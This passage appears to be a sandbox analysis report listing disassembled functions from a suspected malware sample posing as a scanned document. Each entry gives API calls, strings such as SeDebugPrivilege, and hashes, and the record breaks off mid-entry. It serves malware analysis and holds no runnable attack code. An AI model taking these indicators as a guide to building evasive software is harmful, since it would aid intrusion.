API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 7505a96c4070c4a3148eecf8d6a56e14c8bfedfc6c7ea06b052bb83a01509aa1
Instruction ID: 08cb46f75aea1b22f8bcc2a309b9038d8c5d74c89f5f57d3858440274de9e85e
Opcode Fuzzy Hash: 7505a96c4070c4a3148eecf8d6a56e14c8bfedfc6c7ea06b052bb83a01509aa1
Instruction Fuzzy Hash: 9A616D302082419FDB14EF58C494F55BBA5FF44318F18849CE4668BBA2DB76EC85CBD2

Function 008A3886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 008A3925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 008A393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 008A3954
_wcslen.LIBCMT ref: 008A3999
SendMessageW.USER32(?,00001057,00000000,?), ref: 008A39C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 008A39F4

Strings

SysListView32, xrefs: 008A38F7

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: eeddeae30ff6ca45753255523ff733c8d5d02c686135e600cb5835a739c84e32
Instruction ID: 28afd0388d90b9077ee7e575a6f4532230397ca660be7c27eb2415825037a7e9
Opcode Fuzzy Hash: eeddeae30ff6ca45753255523ff733c8d5d02c686135e600cb5835a739c84e32
Instruction Fuzzy Hash: 0C41A371A00218ABEF219F64CC49FEA7BA9FF09350F14052AF958E7281D7759E84CB90

Function 0087BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0087BCFD
IsMenu.USER32(00000000), ref: 0087BD1D
CreatePopupMenu.USER32 ref: 0087BD53
GetMenuItemCount.USER32(00D06828), ref: 0087BDA4
InsertMenuItemW.USER32(00D06828,?,00000001,00000030), ref: 0087BDCC

Strings

2, xrefs: 0087BD37
0, xrefs: 0087BCA8

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 7fcb4b6ff169c6930faf8c1b83f4c6f3c3d8a31c4fed07a8e90d57659d36918e
Instruction ID: 7e1ef10cd941ea462f11a9221d5126847a1949881041c06cf12d6a1b9dff72fc
Opcode Fuzzy Hash: 7fcb4b6ff169c6930faf8c1b83f4c6f3c3d8a31c4fed07a8e90d57659d36918e
Instruction Fuzzy Hash: FB518A70A002099FDB21CFA8D888BAEBFF6FF45354F148119E419D72A9E770D940CB62

Function 0087C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0087C913

Strings

info, xrefs: 0087C8B4
question, xrefs: 0087C8CC
stop, xrefs: 0087C8E4
warning, xrefs: 0087C8FC
blank, xrefs: 0087C895

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 94a0e475e052044b9b400fadb81e1b97a251e345c6d479989429738ba82c533b
Instruction ID: e08ec870101569f42e0a1d90f3364c7b9a6b0cceee7c14282695c1bc4a4394d2
Opcode Fuzzy Hash: 94a0e475e052044b9b400fadb81e1b97a251e345c6d479989429738ba82c533b
Instruction Fuzzy Hash: F911EB3168930EBAA7015B549C82DEA6B9CFF15358B10812FF608E7382E774ED0052A9

Function 0087ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0087ED2A
_wcslen.LIBCMT ref: 0087ED3B
_wcslen.LIBCMT ref: 0087ED79
_wcslen.LIBCMT ref: 0087EDAF
_wcslen.LIBCMT ref: 0087EDDF
_wcslen.LIBCMT ref: 0087EDEF
_wcslen.LIBCMT ref: 0087EE2B
_wcslen.LIBCMT ref: 0087EE5A

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: d7e823e0a352177ea7fb8e52f2f0821e93ccd48b3f2b51670c5d57575da96d3c
Instruction ID: 568ae74cbb5cd9623901e65381b256e1a13c550e2424bedb79479c7d247e9c15
Opcode Fuzzy Hash: d7e823e0a352177ea7fb8e52f2f0821e93ccd48b3f2b51670c5d57575da96d3c
Instruction Fuzzy Hash: 22417765C1121875CB11EBF8888AACF77A8FF89710F509562F518E3121FB78E255C3E6

Function 0082F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0086682C,00000004,00000000,00000000), ref: 0082F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0086682C,00000004,00000000,00000000), ref: 0086F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0086682C,00000004,00000000,00000000), ref: 0086F454

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: d5c024785e872efe6fc2489c99e5c343838902a7d9272dfc290cbdd7a5725d18
Instruction ID: 814dca7f420cf453302ae3ac921ec0a8168c0c1d6202635777317416e501c05f
Opcode Fuzzy Hash: d5c024785e872efe6fc2489c99e5c343838902a7d9272dfc290cbdd7a5725d18
Instruction Fuzzy Hash: 5141F831608690BAD7399B2DB98872A7FB1FB56314F15443CE387D6A63DA31E8C0CB51

Function 008A2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 008A2D1B
GetDC.USER32(00000000), ref: 008A2D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 008A2D2E
ReleaseDC.USER32(00000000,00000000), ref: 008A2D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 008A2D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 008A2D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,008A5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 008A2DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 008A2DE1

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 67cf69fcbba1203ac2095740e8fea1ce7b5347bd8543cee83f4421e2d358601c
Instruction ID: fcd55419ade65b0d4fd0528473ffd8d2b6b393c899f6f1d94f6893c616f64b7d
Opcode Fuzzy Hash: 67cf69fcbba1203ac2095740e8fea1ce7b5347bd8543cee83f4421e2d358601c
Instruction Fuzzy Hash: 02318772201614BBFB218F548C8AFEB3BA9FB1A711F044065FE08DA292D6759C50CBA0

Function 00875622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00875637
_memcmp.LIBVCRUNTIME ref: 00875659
_memcmp.LIBVCRUNTIME ref: 00875671
_memcmp.LIBVCRUNTIME ref: 00875684
_memcmp.LIBVCRUNTIME ref: 0087569E
_memcmp.LIBVCRUNTIME ref: 008756B1
_memcmp.LIBVCRUNTIME ref: 008756C9
_memcmp.LIBVCRUNTIME ref: 008756E4

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 7fa0abfc0038d76296524c9c9935b57e2bfbcd262ccc88ec3c19b680662efa72
Instruction ID: d9bab49044317d0e0708d2eb11a20bb2f3d575470c7c5ed6f9dc181dd60aaf00
Opcode Fuzzy Hash: 7fa0abfc0038d76296524c9c9935b57e2bfbcd262ccc88ec3c19b680662efa72
Instruction Fuzzy Hash: 11212961640A1977E71855258D82FFA335CFF71794F448020FE0CDAB8AFBA8EE1081E6

Function 00894FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0089502E, 00895383
Not an Object type, xrefs: 00895007

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 02c35c4557c58ceaa2483d83f5085018a137e049928ff0d99fe4772eac291480
Instruction ID: 4ccb9fba8269456a5fbd169046b832ff2142e097b8530085a088dc16854debd8
Opcode Fuzzy Hash: 02c35c4557c58ceaa2483d83f5085018a137e049928ff0d99fe4772eac291480
Instruction Fuzzy Hash: 2AD1B171A0060A9FDF11DFA8C881BAEB7B5FF48344F188169E915EB281E770DD45CB90

Function 00851522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,008517FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 008515CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,008517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00851651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,008517FB,?,008517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 008516E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,008517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 008516FB

Part of subcall function 00843820: RtlAllocateHeap.NTDLL(00000000,?,008E1444,?,0082FDF5,?,?,0081A976,00000010,008E1440,008113FC,?,008113C6,?,00811129), ref: 00843852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,008517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00851777
__freea.LIBCMT ref: 008517A2
__freea.LIBCMT ref: 008517AE

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 2b64ed26ba92d56ac26c70cc0c4a1052f7e818ee97f26f867dd9f414a46a678d
Instruction ID: 0eb7534d8dd2865860226dc7c2b1176b0eca33e14278e692d10de0e38226fffc
Opcode Fuzzy Hash: 2b64ed26ba92d56ac26c70cc0c4a1052f7e818ee97f26f867dd9f414a46a678d
Instruction Fuzzy Hash: 58919171F0021A9ADF208E78C889BEE7BA5FF49715F184659EC02E7141EB35DC48CBA0

Function 00894523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00894648
VariantInit.OLEAUT32(?), ref: 00894749
VariantClear.OLEAUT32(?), ref: 00894753
VariantClear.OLEAUT32(?), ref: 008947B0

Strings

Null Object assignment in FOR..IN loop, xrefs: 008945D8, 00894706, 008947BE
Incorrect Object type in FOR..IN loop, xrefs: 0089472C

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 2cbdb67f72201b8f5d09acd0730acba3f9e60ad6d7ba261003e8efb1faa7b6e9
Instruction ID: 2cf3272162f9900fb3b131bbc59ccefdb942ca4339f006ec513029bccae6df33
Opcode Fuzzy Hash: 2cbdb67f72201b8f5d09acd0730acba3f9e60ad6d7ba261003e8efb1faa7b6e9
Instruction Fuzzy Hash: FC918C71A0021DABDF20EFA4C884FAEBBB8FF46714F148559F515EB281D7709946CBA0

Function 00881187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0088125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00881284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 008812A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008812D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0088135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 008813C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00881430

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 32203969a9772fe2cfc062d1d9de0c2bc7e668231931efc105f5993ff82e633f
Instruction ID: 3ed429001a582b237cf0342330dfd755c018ad874d96f6485f5fc4725532994f
Opcode Fuzzy Hash: 32203969a9772fe2cfc062d1d9de0c2bc7e668231931efc105f5993ff82e633f
Instruction Fuzzy Hash: 2691E271A002199FDF10EF98C888BBEB7BDFF45315F104029E941EB292DB74A946CB95

Function 0082948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 42778a37a00f072ce297ec0e2cd5bdcb6d43f7d76c2b1d848df533da3e3df41f
Instruction ID: 70aa0cde7efb53b33d3d951b937f9bf7f22083b807600b74ed20d4e71c1f1faa
Opcode Fuzzy Hash: 42778a37a00f072ce297ec0e2cd5bdcb6d43f7d76c2b1d848df533da3e3df41f
Instruction Fuzzy Hash: 85912571E00219EFCB10CFA9D984AEEBBB8FF49324F144059E955F7251D378A981CBA0

Function 00893947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0089396B
CharUpperBuffW.USER32(?,?), ref: 00893A7A
_wcslen.LIBCMT ref: 00893A8A
VariantClear.OLEAUT32(?), ref: 00893C1F

Part of subcall function 00880CDF: VariantInit.OLEAUT32(00000000), ref: 00880D1F
Part of subcall function 00880CDF: VariantCopy.OLEAUT32(?,?), ref: 00880D28
Part of subcall function 00880CDF: VariantClear.OLEAUT32(?), ref: 00880D34

Strings

AUTOIT.ERROR, xrefs: 00893A80, 00893A85
Incorrect Parameter format, xrefs: 008939A6, 00893BA1

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 03bda8ccfe21a11436cdefd07eaa0d72a699949673bc4b343bfca45752942a74
Instruction ID: 381817fc9963af4f2d62900d3276e7142e4b1ac082b170aca5b3be2db9fa4e66
Opcode Fuzzy Hash: 03bda8ccfe21a11436cdefd07eaa0d72a699949673bc4b343bfca45752942a74
Instruction Fuzzy Hash: 319113756083059FCB04EF68C48096ABBE5FF89314F18892DF88AD7351DB31EA45CB92

Function 00894BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0087000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0086FF41,80070057,?,?,?,0087035E), ref: 0087002B
Part of subcall function 0087000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0086FF41,80070057,?,?), ref: 00870046
Part of subcall function 0087000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0086FF41,80070057,?,?), ref: 00870054
Part of subcall function 0087000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0086FF41,80070057,?), ref: 00870064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00894C51
_wcslen.LIBCMT ref: 00894D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00894DCF
CoTaskMemFree.OLE32(?), ref: 00894DDA

Strings

NULL Pointer assignment, xrefs: 00894E23, 00894E52

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: 0a2910f66cb679823f72564cf2e92a1d7fc99f895020a7695138ab4f26150be1
Instruction ID: 62f7abec79aafd9fde36be978ef3050fe8d0fd8c15df8f5800bf46ceebee47ab
Opcode Fuzzy Hash: 0a2910f66cb679823f72564cf2e92a1d7fc99f895020a7695138ab4f26150be1
Instruction Fuzzy Hash: 70911571D0021DAFDF14EFA4D890EEEB7B8FF08314F108169E919A7251EB349A458F61

Function 008A20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 008A2183
GetMenuItemCount.USER32(00000000), ref: 008A21B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 008A21DD
_wcslen.LIBCMT ref: 008A2213
GetMenuItemID.USER32(?,?), ref: 008A224D
GetSubMenu.USER32(?,?), ref: 008A225B

Part of subcall function 00873A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00873A57
Part of subcall function 00873A3D: GetCurrentThreadId.KERNEL32 ref: 00873A5E
Part of subcall function 00873A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,008725B3), ref: 00873A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 008A22E3

Part of subcall function 0087E97B: Sleep.KERNEL32 ref: 0087E9F3

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460028736.00000000008DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1460043966.00000000008E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_810000_rHP_SCAN_DOCUME.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: 1c7bac35f7b44e04616f2995af3d78a7296e511e9d70aec26b577790d2f2ba47
Instruction ID: 8a665e8f97eafc110c55f2ce08cbe742bc94e7c0f6cd2496bdc6fc3316b541a3
Opcode Fuzzy Hash: 1c7bac35f7b44e04616f2995af3d78a7296e511e9d70aec26b577790d2f2ba47
Instruction Fuzzy Hash: F1718E35A00215AFDB20DF68C841AAEB7F5FF49310F148459E916EB751DB34ED41CB91

Function 0087AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0087AEF9
GetKeyboardState.USER32(?), ref: 0087AF0E
SetKeyboardState.USER32(?), ref: 0087AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0087AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0087AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0087AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0087B020

Memory Dump Source

Source File: 00000000.00000002.1459938421.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true

Associated: 00000000.00000002.1459924600.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1459985121.00000000008AC000.00000002.00000001.01000000.00000003.sdmpDownload File
